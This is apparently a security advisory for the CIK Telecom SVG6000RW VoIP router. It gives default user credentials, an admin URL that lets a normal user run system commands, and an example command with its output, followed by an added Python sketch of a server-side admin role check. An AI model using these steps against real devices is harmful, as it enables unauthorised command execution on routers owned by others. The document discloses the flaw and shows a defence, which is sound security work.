####################################################################
#
# Exploit Title: CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution
# Date: 2014/12/10
# Exploit Author: Chako
# Vendor Homepage: https://www.ciktel.com/
#
####################################################################

Description:
CIK Telecom VoIP router SVG6000RW has a Privilege Escalation vulnerability
and can lead to Command Execution.

Exploit:

1) Log in as a normal user
   Default Username: User Password: cikvoip

2) Change URL to http://URL/adm/system_command.asp
   and now you can run commands.

Example:

Command: ls /etc_rw/web

Result:

internet
cgi-bin
homemode_conf.asp
menu-en.swf
wireless
md5.js
hotelmode_conf.asp
waitAndReboot.asp
graphics
menu.swf
getMac.asp
quickconfig.asp
javascript
firewall
home.asp
customermode_conf.asp
wait.asp
station
login.asp
main.css
overview.asp
style
voip
lang
wps
usb
adm
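
Added example (not part of the original advisory and not the vendor's firmware code): as described above, a normal user reaches /adm/system_command.asp just by changing the URL, which points to a missing server-side role check on the /adm/ page tree. This Python sketch puts a login-only gate beside one that canonicalises the request path and requires an admin role; the role labels and function names are assumptions made for illustration.

```python
import posixpath
from urllib.parse import unquote

ADMIN_PREFIX = "/adm/"   # admin page tree named in the advisory
ADMIN_ROLE = "admin"     # assumed role label; the advisory only says "normal user"


def login_only_gate(role, raw_path):
    """Weak form (assumed): any logged-in session may fetch any page."""
    return role is not None


def canonical_path(raw_path):
    """Decode and normalise a request path; None means 'refuse to guess'."""
    path = raw_path.split("?", 1)[0].split("#", 1)[0]
    # Undo percent-encoding until stable; give up after three rounds.
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    else:
        return None
    path = path.replace("\\", "/")
    # normpath keeps a leading '//', so strip leading slashes first.
    path = posixpath.normpath("/" + path.lstrip("/"))
    # Lower-casing is conservative: it can only widen what counts as admin.
    return path.lower()


def is_allowed(role, raw_path):
    """Hardened form: the /adm/ tree needs the admin role, checked server-side."""
    path = canonical_path(raw_path)
    if path is None or role is None:
        return False                      # fail closed
    if path == "/adm" or path.startswith(ADMIN_PREFIX):
        return role == ADMIN_ROLE
    return True   # non-admin pages: the login check above is enough
```

The decision is made on the canonical path, so the same function has to be called on every request handler rather than only when building the menu for a given role.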